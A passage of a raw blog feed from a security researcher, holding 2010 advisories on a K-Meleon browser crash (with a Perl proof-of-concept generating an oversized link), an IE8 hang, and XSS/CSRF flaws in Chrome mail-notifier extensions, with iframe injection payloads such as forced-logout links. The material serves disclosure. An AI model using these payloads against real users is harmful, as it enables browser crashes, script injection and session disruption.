Versions Tested&lt;br /&gt;
#################&lt;br /&gt;
&lt;br /&gt;
I have tested this issue in win xp sp3 and a windows 7 fully pached.&lt;br /&gt;
&lt;br /&gt;
Win XP sp3:&lt;br /&gt;
K-meleon 1.5.3 &amp;amp; 1.5.4  Vulnerables.(crashes )&lt;br /&gt;
K-Meleon 1.6.0a4 Vulnerables.(crashes)&lt;br /&gt;
&lt;br /&gt;
windows 7 Ultimate:&lt;br /&gt;
K-meleon 1.5.3 &amp;amp; 1.5.4  Vulnerables.(crashes)&lt;br /&gt;
K-Meleon 1.6.0a4   Vulnerables.(crashes)&lt;br /&gt;
&lt;br /&gt;
############&lt;br /&gt;
References&lt;br /&gt;
############&lt;br /&gt;
&lt;br /&gt;
Discovered: 29-07-2010&lt;br /&gt;
vendor notify:31-07-2010&lt;br /&gt;
Vendor Response:&lt;br /&gt;
Vendor patch:&lt;br /&gt;
&lt;br /&gt;
########################&lt;br /&gt;
ASM code stack overflow&lt;br /&gt;
########################&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_oOk20qcOiUk/TFmDVYmRvHI/AAAAAAAAADM/GMymL2zrnRc/s1600/k-meleon.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="125" src="http://2.bp.blogspot.com/_oOk20qcOiUk/TFmDVYmRvHI/AAAAAAAAADM/GMymL2zrnRc/s200/k-meleon.png" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;################ &lt;br /&gt;
#Proof Of Concept &lt;br /&gt;
################  &lt;br /&gt;
&lt;br /&gt;
#######################################################################&lt;br /&gt;
#!/usr/bin/perl&lt;br /&gt;
# k-meleon Long "a href" Link DoS&lt;br /&gt;
# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com&lt;br /&gt;
# k-Meleon versions 1.5.3 &amp; 1.5.4 internal page about:neterror DoS&lt;br /&gt;
# generate the file open it with k-keleon click in the link and wait a seconds&lt;br /&gt;
######################################################################&lt;br /&gt;
&lt;br /&gt;
$archivo = $ARGV[0];&lt;br /&gt;
if(!defined($archivo))&lt;br /&gt;
{&lt;br /&gt;
&lt;br /&gt;
print "Usage: $0 &amp;lt;archivo.html&amp;gt;\n";&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
$cabecera = "&amp;lt;html&amp;gt;" . "\n";&lt;br /&gt;
$payload = "&amp;lt;a href=\"about:neterror?e=connectionFailure&amp;c=" . "/" x 1028135 . "\"&gt;click here if you can :)&amp;lt;/a&amp;gt;" . "\n";&lt;br /&gt;
$fin = "&amp;lt;/html&amp;gt;";&lt;br /&gt;
&lt;br /&gt;
$datos = $cabecera . $payload . $fin;&lt;br /&gt;
&lt;br /&gt;
open(FILE, '&amp;lt;' . $archivo);&lt;br /&gt;
print FILE $datos;&lt;br /&gt;
close(FILE);&lt;br /&gt;
&lt;br /&gt;
exit;&lt;br /&gt;
&lt;br /&gt;
################## EOF ######################&lt;br /&gt;
&lt;br /&gt;
##############&lt;br /&gt;
Related Links&lt;br /&gt;
##############&lt;br /&gt;
&lt;br /&gt;
vendor bugtracker : http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251&lt;br /&gt;
Posible related Vuln: https://bugzilla.mozilla.org/show_bug.cgi?id=583474&lt;br /&gt;
Test Case : https://bugzilla.mozilla.org/attachment.cgi?id=461776&lt;br /&gt;
&lt;br /&gt;
###################### €nd #############################&lt;br /&gt;
&lt;br /&gt;
Thnx to Phreak for support and let me undestanding the nature of this bug&lt;br /&gt;
thnx to jajoni for test it in windows 7 X64 bits version.&lt;br /&gt;
&lt;br /&gt;
atentamente:&lt;br /&gt;
Lostmon (lostmon@gmail.com)&lt;br /&gt;
Web-Blog: http://lostmon.blogspot.com/&lt;br /&gt;
Google group: http://groups.google.com/group/lostmon (new)&lt;br /&gt;
--&lt;br /&gt;
La curiosidad es lo que hace mover la mente....&lt;div class="blogger-post-footer"&gt;Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-1575278226327104105?l=lostmon.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/QjqON93SZtpzVaA3_App_3gJWnw/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/QjqON93SZtpzVaA3_App_3gJWnw/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/QjqON93SZtpzVaA3_App_3gJWnw/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/QjqON93SZtpzVaA3_App_3gJWnw/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/aQrN9HUv8rQ" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/1575278226327104105?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/1575278226327104105?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/LostmonBlogger/~3/aQrN9HUv8rQ/k-meleon-for-windows-aboutneterror-dos.html" title="K-Meleon for windows about:neterror Stack Overflow DoS" /><author><name>Lostmon</name><uri>http://www.blogger.com/profile/12070694315455553235</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="http://3.bp.blogspot.com/-5DGRJl6Jr6M/ToB1VFVQYRI/AAAAAAAAAFQ/OPxHyYkIkNU/s220/avatar.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/_oOk20qcOiUk/TFmDVYmRvHI/AAAAAAAAADM/GMymL2zrnRc/s72-c/k-meleon.png" height="72" width="72" /><feedburner:origLink>http://lostmon.blogspot.com/2010/08/k-meleon-for-windows-aboutneterror-dos.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEAER3o4eSp7ImA9WxFaEE4.&quot;"><id>tag:blogger.com,1999:blog-9011578.post-712768638608002632</id><published>2010-07-13T16:48:00.001+02:00</published><updated>2010-07-13T16:51:46.431+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-07-13T16:51:46.431+02:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="DoS" /><category scheme="http://www.blogger.com/atom/ns#" term="bug" /><category scheme="http://www.blogger.com/atom/ns#" term="browsers" /><category scheme="http://www.blogger.com/atom/ns#" term="vulnerability" /><category scheme="http://www.blogger.com/atom/ns#" term="security" /><category scheme="http://www.blogger.com/atom/ns#" term="crash" /><title>IE8 On windows 7 32 bits unspecified DoS</title><content type="html">##########################################&lt;br /&gt;
IE8 On windows 7 32 bits unspecified DoS&lt;br /&gt;
Vendor URL:http://www.microsoft.com&lt;br /&gt;
Advisore:http://lostmon.blogspot.com/2010/07/ie8-on-windows-7-32-bits-unspecified.html&lt;br /&gt;
Vendor Notify:YES Vendor confirmed:YES &lt;br /&gt;
EXPLOIT:Private&lt;br /&gt;
###########################################&lt;br /&gt;
&lt;br /&gt;
A posible flaw exits in Internet explorer 8&lt;br /&gt;
on windows 7 32-bits ,that can cause a remote &lt;br /&gt;
denial of service from a malformed web page.&lt;br /&gt;
&lt;br /&gt;
This issue is tiggered when IE8 try to render&lt;br /&gt;
Modal app prompt in conjuncion with thirds appz that &lt;br /&gt;
uses recurses from IE8 and try to render text inputs&lt;br /&gt;
it is a posible GDI text-rendering&lt;br /&gt;
APIs bug or or DrawText()  functions involved.&lt;br /&gt;
&lt;br /&gt;
When the victim visit a malformed web page, an close the 2nd&lt;br /&gt;
appz, this appz turns unstable and needs to close , and then &lt;br /&gt;
when IE8 try to restore&lt;br /&gt;
the tab ,it los the focus from application and it results in&lt;br /&gt;
a denial of service to this window , because we can't click &lt;br /&gt;
in any bar , in any button or do some action in this window,&lt;br /&gt;
ie8 aparently is frozen.&lt;br /&gt;
&lt;br /&gt;
After several test this issue only is reproducible in win7 32 bits&lt;br /&gt;
&lt;br /&gt;
I have a exploit or PoC for this issue , but it's&lt;br /&gt;
private at this time :)&lt;br /&gt;
&lt;br /&gt;
Solution:&lt;br /&gt;
Microsoft know that as a stability bug and they add it &lt;br /&gt;
for consideration in a future version to address it.&lt;br /&gt;
&lt;br /&gt;
#################### €nd ##########################&lt;br /&gt;
&lt;br /&gt;
Thnx for your time !!!&lt;br /&gt;
atentamente:&lt;br /&gt;
Lostmon (lostmon@gmail.com)&lt;br /&gt;
Web-Blog: http://lostmon.blogspot.com/&lt;br /&gt;
Google group: http://groups.google.com/group/lostmon (new)&lt;br /&gt;
--&lt;br /&gt;
La curiosidad es lo que hace mover la mente....&lt;div class="blogger-post-footer"&gt;Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-712768638608002632?l=lostmon.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/NMpKG4EOm6XQygdcNMySub1zRcs/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/NMpKG4EOm6XQygdcNMySub1zRcs/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/NMpKG4EOm6XQygdcNMySub1zRcs/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/NMpKG4EOm6XQygdcNMySub1zRcs/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/d6MTuYmj7ok" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/712768638608002632?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/712768638608002632?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/LostmonBlogger/~3/d6MTuYmj7ok/ie8-on-windows-7-32-bits-unspecified.html" title="IE8 On windows 7 32 bits unspecified DoS" /><author><name>Lostmon</name><uri>http://www.blogger.com/profile/12070694315455553235</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="http://3.bp.blogspot.com/-5DGRJl6Jr6M/ToB1VFVQYRI/AAAAAAAAAFQ/OPxHyYkIkNU/s220/avatar.jpg" /></author><feedburner:origLink>http://lostmon.blogspot.com/2010/07/ie8-on-windows-7-32-bits-unspecified.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkUGQH4zfSp7ImA9WxFVGEU.&quot;"><id>tag:blogger.com,1999:blog-9011578.post-2052504617101296325</id><published>2010-06-18T21:09:00.003+02:00</published><updated>2010-06-18T21:10:21.085+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-06-18T21:10:21.085+02:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="extensions" /><category scheme="http://www.blogger.com/atom/ns#" term="CSRF" /><category scheme="http://www.blogger.com/atom/ns#" term="bug" /><category scheme="http://www.blogger.com/atom/ns#" term="browsers" /><category scheme="http://www.blogger.com/atom/ns#" term="XSS" /><category scheme="http://www.blogger.com/atom/ns#" term="vulnerability" /><category scheme="http://www.blogger.com/atom/ns#" term="security" /><title>Google Services Notifier Chrome extension XSS/CSRF</title><content type="html">######################################&lt;br /&gt;
Google Services Notifier Chrome extension XSS/CSRF&lt;br /&gt;
extension:https://chrome.google.com/extensions/detail/dmgbflokapnkfnegeigclohhplnflgie&lt;br /&gt;
advisore:http://lostmon.blogspot.com/2010/06/google-services-notifier-chrome.html&lt;br /&gt;
Exploit available:yes vendor notify : NO&lt;br /&gt;
#######################################&lt;br /&gt;
&lt;br /&gt;
So in this case "Notifier for Google Wave Chrome" &lt;br /&gt;
has a flaw that allow attackers to make XSS style attacks.&lt;br /&gt;
&lt;br /&gt;
All extensions runs over his origin and no have way to altered data from extension &lt;br /&gt;
or get sensitive data like , email account or password etc..&lt;br /&gt;
&lt;br /&gt;
if we look how many users have instaled this extension =&gt;&lt;br /&gt;
https://chrome.google.com/extensions/detail/dmgbflokapnkfnegeigclohhplnflgie&lt;br /&gt;
109 users have instaled it (WoW)&lt;br /&gt;
&lt;br /&gt;
############&lt;br /&gt;
explanation&lt;br /&gt;
############&lt;br /&gt;
&lt;br /&gt;
Google Services Notifier allows users to view wen they have a new wave and&lt;br /&gt;
view a preview of it ....&lt;br /&gt;
&lt;br /&gt;
"Keep you update with Google services like Google Mail,Blogger,Reader,YouTube,&lt;br /&gt;
Google Docs, Google Wave etc. More services will be added soon."&lt;br /&gt;
&lt;br /&gt;
If a attacker compose a new mail with html or javascript code in &lt;br /&gt;
subject &amp; send it to victim´s the code is executed wen Victim´s click in the&lt;br /&gt;
extension to view a preview of mail.&lt;br /&gt;
&lt;br /&gt;
So for exploit we need to compose a "special" mail&lt;br /&gt;
for example if we put directly in the mail subject a iframe like&lt;br /&gt;
"&amp;gt;&amp;lt;iframe src="javascript:alert(location.href);"&amp;gt;&amp;lt;/iframe&amp;gt;&lt;br /&gt;
in the two cases the alert is executed wen try to preview the mail &lt;br /&gt;
with the extension :) it is executed in context location.href value is&lt;br /&gt;
"about:blank"&lt;br /&gt;
&lt;br /&gt;
For example send a mail With a logout acction in google wave in body&lt;br /&gt;
"&amp;gt;&amp;lt;iframe src="https://wave.google.com/wave/logout"&amp;gt;&amp;lt;/iframe&amp;gt;&lt;br /&gt;
it closes the sesion on google wave , this is a CSRF.&lt;br /&gt;
&lt;br /&gt;
######################€nd#################################&lt;br /&gt;
.&lt;br /&gt;
Thnx for your time !!!&lt;br /&gt;
atentamente:&lt;br /&gt;
Lostmon (lostmon@gmail.com)&lt;br /&gt;
Web-Blog: http://lostmon.blogspot.com/&lt;br /&gt;
Google group: http://groups.google.com/group/lostmon (new)&lt;br /&gt;
--&lt;br /&gt;
La curiosidad es lo que hace mover la mente....&lt;div class="blogger-post-footer"&gt;Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-2052504617101296325?l=lostmon.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/-8cV8obUe16QnKqbjJ2QE8nmqDE/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/-8cV8obUe16QnKqbjJ2QE8nmqDE/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/-8cV8obUe16QnKqbjJ2QE8nmqDE/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/-8cV8obUe16QnKqbjJ2QE8nmqDE/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/V3H1PicQBho" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/2052504617101296325?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/2052504617101296325?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/LostmonBlogger/~3/V3H1PicQBho/google-services-notifier-chrome.html" title="Google Services Notifier Chrome extension XSS/CSRF" /><author><name>Lostmon</name><uri>http://www.blogger.com/profile/12070694315455553235</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="http://3.bp.blogspot.com/-5DGRJl6Jr6M/ToB1VFVQYRI/AAAAAAAAAFQ/OPxHyYkIkNU/s220/avatar.jpg" /></author><feedburner:origLink>http://lostmon.blogspot.com/2010/06/google-services-notifier-chrome.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DEcNR3s9cCp7ImA9WxFVGEU.&quot;"><id>tag:blogger.com,1999:blog-9011578.post-6698244068036387182</id><published>2010-06-18T20:32:00.002+02:00</published><updated>2010-06-18T20:34:56.568+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-06-18T20:34:56.568+02:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="extensions" /><category scheme="http://www.blogger.com/atom/ns#" term="CSRF" /><category scheme="http://www.blogger.com/atom/ns#" term="bug" /><category scheme="http://www.blogger.com/atom/ns#" term="browsers" /><category scheme="http://www.blogger.com/atom/ns#" term="XSS" /><category scheme="http://www.blogger.com/atom/ns#" term="vulnerability" /><category scheme="http://www.blogger.com/atom/ns#" term="security" /><title>Notifier for Google Wave Chrome extension XSS/CSRF</title><content type="html">######################################&lt;br /&gt;
Notifier for Google Wave Chrome extension XSS/CSRF&lt;br /&gt;
extension:https://chrome.google.com/extensions/detail/aphncaagnlabkeipnbbicmcahnamibgb&lt;br /&gt;
advisore:http://lostmon.blogspot.com/2010/06/notifier-for-google-wave-chrome.html&lt;br /&gt;
Exploit available:yes vendor notify : NO&lt;br /&gt;
#######################################&lt;br /&gt;
&lt;br /&gt;
So in this case "Notifier for Google Wave Chrome" &lt;br /&gt;
has a flaw that allow attackers to make XSS style attacks.&lt;br /&gt;
&lt;br /&gt;
All extensions runs over his origin and no have way to altered data from extension &lt;br /&gt;
or get sensitive data like , email account or password etc..&lt;br /&gt;
&lt;br /&gt;
if we look how many users have instaled this extension =&amp;gt;&lt;br /&gt;
https://chrome.google.com/extensions/detail/aphncaagnlabkeipnbbicmcahnamibgb&lt;br /&gt;
56,542 users have instaled it (WoW)&lt;br /&gt;
&lt;br /&gt;
############&lt;br /&gt;
explanation&lt;br /&gt;
############&lt;br /&gt;
&lt;br /&gt;
Notifier for Google Wave allows users to view wen they have a new wave and&lt;br /&gt;
view a preview of it ....&lt;br /&gt;
&lt;br /&gt;
If a attacker compose a new wave with html or javascript code in &lt;br /&gt;
body &amp; send it to victim´s the code is executed wen Victim´s click in the&lt;br /&gt;
extension to view a preview of wave.&lt;br /&gt;
&lt;br /&gt;
So for exploit we need to compose a "special" wave&lt;br /&gt;
for example if we put directly in the mail body a iframe like&lt;br /&gt;
"&amp;gt;&amp;lt;iframe src="javascript:alert(location.href);"&amp;gt;&amp;lt;/iframe&amp;gt;&lt;br /&gt;
in the two cases the alert is executed wen try to preview the wave &lt;br /&gt;
with the extension :) it is executed in  context location.href value is&lt;br /&gt;
"about:blank"&lt;br /&gt;
&lt;br /&gt;
For example send a wave With a logout acction in google wave in body&lt;br /&gt;
"&amp;gt;&amp;lt;iframe src="https://wave.google.com/wave/logout"&amp;gt;&amp;lt;/iframe&amp;gt;&lt;br /&gt;
it closes the sesion on google wave , this is a CSRF.&lt;br /&gt;
&lt;br /&gt;
######################€nd#################################&lt;br /&gt;
.&lt;br /&gt;
&lt;br /&gt;
Thnx for your time !!!&lt;br /&gt;
&lt;br /&gt;
atentamente:&lt;br /&gt;
Lostmon (lostmon@gmail.com)&lt;br /&gt;
Web-Blog: http://lostmon.blogspot.com/&lt;br /&gt;
Google group: http://groups.google.com/group/lostmon (new)&lt;br /&gt;
--&lt;br /&gt;
La curiosidad es lo que hace mover la mente....&lt;div class="blogger-post-footer"&gt;Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-6698244068036387182?l=lostmon.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/RavGMj5krb8ot4496sQYAQKv6aM/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/RavGMj5krb8ot4496sQYAQKv6aM/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/RavGMj5krb8ot4496sQYAQKv6aM/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/RavGMj5krb8ot4496sQYAQKv6aM/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/LT3iORvbbuM" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/6698244068036387182?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/6698244068036387182?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/LostmonBlogger/~3/LT3iORvbbuM/notifier-for-google-wave-chrome.html" title="Notifier for Google Wave Chrome extension XSS/CSRF" /><author><name>Lostmon</name><uri>http://www.blogger.com/profile/12070694315455553235</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="http://3.bp.blogspot.com/-5DGRJl6Jr6M/ToB1VFVQYRI/AAAAAAAAAFQ/OPxHyYkIkNU/s220/avatar.jpg" /></author><feedburner:origLink>http://lostmon.blogspot.com/2010/06/notifier-for-google-wave-chrome.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DUMHSXkzfSp7ImA9WxFUEk0.&quot;"><id>tag:blogger.com,1999:blog-9011578.post-8370962836709252692</id><published>2010-06-17T20:56:00.003+02:00</published><updated>2010-06-22T13:50:38.785+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-06-22T13:50:38.785+02:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="CSRF" /><category scheme="http://www.blogger.com/atom/ns#" term="bug" /><category scheme="http://www.blogger.com/atom/ns#" term="browsers" /><category scheme="http://www.blogger.com/atom/ns#" term="XSS" /><category scheme="http://www.blogger.com/atom/ns#" term="vulnerability" /><category scheme="http://www.blogger.com/atom/ns#" term="security" /><category scheme="http://www.blogger.com/atom/ns#" term="patch" /><title>Gmail Checker plus Chrome extension XSS/CSRF II</title><content type="html">######################################&lt;br /&gt;
Gmail Checker plus Chrome extension XSS/CSRF II&lt;br /&gt;
extension: https://chrome.google.com/extensions/detail/gffjhibehnempbkeheiccaincokdjbfe&lt;br /&gt;
advisore:http://lostmon.blogspot.com/2010/06/gmail-checker-plus-chrome-extension.html&lt;br /&gt;
Exploit available:yes vendor notify: NO&lt;br /&gt;
#######################################&lt;br /&gt;
&lt;br /&gt;
So in this case "Google Mail Checker Plus" version 1.1.7 (2010-02-10)&lt;br /&gt;
has a flaw that allow attackers to make XSS style attacks.&lt;br /&gt;
&lt;br /&gt;
All extensions runs over his origin and no have way to altered data from extension &lt;br /&gt;
or get sensitive data like , email account or password etc..&lt;br /&gt;
&lt;br /&gt;
if we look how many users have instaled this extension =&amp;gt;&lt;br /&gt;
https://chrome.google.com/extensions/detail/gffjhibehnempbkeheiccaincokdjbfe&lt;br /&gt;
303,711 users have instaled it (WoW)&lt;br /&gt;
&lt;br /&gt;
############&lt;br /&gt;
explanation&lt;br /&gt;
############&lt;br /&gt;
&lt;br /&gt;
Google Mail Checker Plus allows users to view wen they have a new mail and&lt;br /&gt;
view a preview of the mail ....&lt;br /&gt;
&lt;br /&gt;
If a attacker compose a new mail with html or javascript code in mail &lt;br /&gt;
body &amp; send it to victim´s the code is executed wen Victim´s click in the&lt;br /&gt;
extension to view a preview of mail.&lt;br /&gt;
&lt;br /&gt;
So for exploit we need to compose a "special" mail &lt;br /&gt;
for example if we put directly in the mail body a iframe like&lt;br /&gt;
"&amp;gt;&amp;lt;iframe src="javascript:alert(location.href);"&amp;gt;&amp;lt;/iframe&amp;gt;&lt;br /&gt;
the extension shows this code in plain text and the alert isn´t executed...&lt;br /&gt;
them we need to use a Feature from gmail ( auto conver links in clicable urls)&lt;br /&gt;
them we can compose a email body with a http link like&lt;br /&gt;
http://"&amp;gt;&amp;lt;iframe src="javascript:alert(location.href);"&amp;gt;&amp;lt;/iframe&amp;gt;&lt;br /&gt;
or compose a mail link like :&lt;br /&gt;
lalala@"&amp;gt;&amp;lt;iframe src="javascript:alert(location.href);"&amp;gt;&amp;lt;/iframe&amp;gt;.com&lt;br /&gt;
in the two cases the alert is executed wen try to preview the email &lt;br /&gt;
with the extension :) it is executed in  context location.href value is&lt;br /&gt;
"about:blank"&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Gmail is a safe place , but the extensions to manage it, can be a potential&lt;br /&gt;
vector to attack.&lt;br /&gt;
&lt;br /&gt;
For example send a email With a logout acction in gmail in body&lt;br /&gt;
http://"&amp;gt;&amp;lt;iframe src="https://mail.google.com/mail/?logout&amp;hl=es"&amp;gt;&amp;lt;/iframe&amp;gt;&lt;br /&gt;
it closes the sesion on gmail , this is a CSRF.&lt;br /&gt;
also if the user has mark option to show notifications on desktop this issue execute the iframe too in the desktop notifications window and can cause to a denial of service of extension, for example if the victim´s try to change any option in options page from extension :P&lt;br /&gt;
&lt;br /&gt;
So we have dispute it in http://code.google.com/p/chromium/issues/detail?id=45401&lt;br /&gt;
The developer has release a patch version in trunk  for other issues what i disclose before&lt;br /&gt;
see for references for previous vulns =&amp;gt; OSVDB ID :65459 and OSVDB ID: 65460&lt;br /&gt;
previous patch =&amp;gt;&lt;br /&gt;
http://github.com/AndersSahlin/MailCheckerPlus/blob/54ab118e505feae819e676c8e525e8fe5409c981/src/mailaccount.class.js&lt;br /&gt;
and see diff =&amp;gt; http://github.com/AndersSahlin/MailCheckerPlus/commit/54ab118e505feae819e676c8e525e8fe5409c981#diff-0&lt;br /&gt;
&lt;br /&gt;
&lt;strike&gt;I release it as 0-day and no notify to vendor because&lt;br /&gt;
in the previous issues , he patch the vulns and don´t &lt;br /&gt;
make any reference to it and stealing credits on discover&lt;br /&gt;
Them i release this new vulns without notify developer :)&lt;/strike&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;UPDATED&lt;/b&gt; :Now the extension in about secition reflects the vulnerability and credit it to me :)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
######################€nd#################################&lt;br /&gt;
.&lt;br /&gt;
&lt;br /&gt;
Thnx for your time !!!&lt;br /&gt;
&lt;br /&gt;
atentamente:&lt;br /&gt;
Lostmon (lostmon@gmail.com)&lt;br /&gt;
Web-Blog: http://lostmon.blogspot.com/&lt;br /&gt;
Google group: http://groups.google.com/group/lostmon (new)&lt;br /&gt;
--&lt;br /&gt;
La curiosidad es lo que hace mover la mente....&lt;div class="blogger-post-footer"&gt;Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-8370962836709252692?l=lostmon.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/BkGgNFBbUZn8XSiVgQWySbty-o0/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/BkGgNFBbUZn8XSiVgQWySbty-o0/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/BkGgNFBbUZn8XSiVgQWySbty-o0/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/BkGgNFBbUZn8XSiVgQWySbty-o0/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/dLO7FT9eadY" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/8370962836709252692?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/8370962836709252692?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/LostmonBlogger/~3/dLO7FT9eadY/gmail-checker-plus-chrome-extension.html" title="Gmail Checker plus Chrome extension XSS/CSRF II" /><author><name>Lostmon</name><uri>http://www.blogger.com/profile/12070694315455553235</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="http://3.bp.blogspot.com/-5DGRJl6Jr6M/ToB1VFVQYRI/AAAAAAAAAFQ/OPxHyYkIkNU/s220/avatar.jpg" /></author><feedburner:origLink>http://lostmon.blogspot.com/2010/06/gmail-checker-plus-chrome-extension.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEEMQn8-eSp7ImA9WxFVFk0.&quot;"><id>tag:blogger.com,1999:blog-9011578.post-4565582108330409150</id><published>2010-06-03T11:56:00.004+02:00</published><updated>2010-06-15T13:51:23.151+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-06-15T13:51:23.151+02:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="CSRF" /><category scheme="http://www.blogger.com/atom/ns#" term="bug" /><category scheme="http://www.blogger.com/atom/ns#" term="browsers" /><category scheme="http://www.blogger.com/atom/ns#" term="XSS" /><category scheme="http://www.blogger.com/atom/ns#" term="vulnerability" /><category scheme="http://www.blogger.com/atom/ns#" 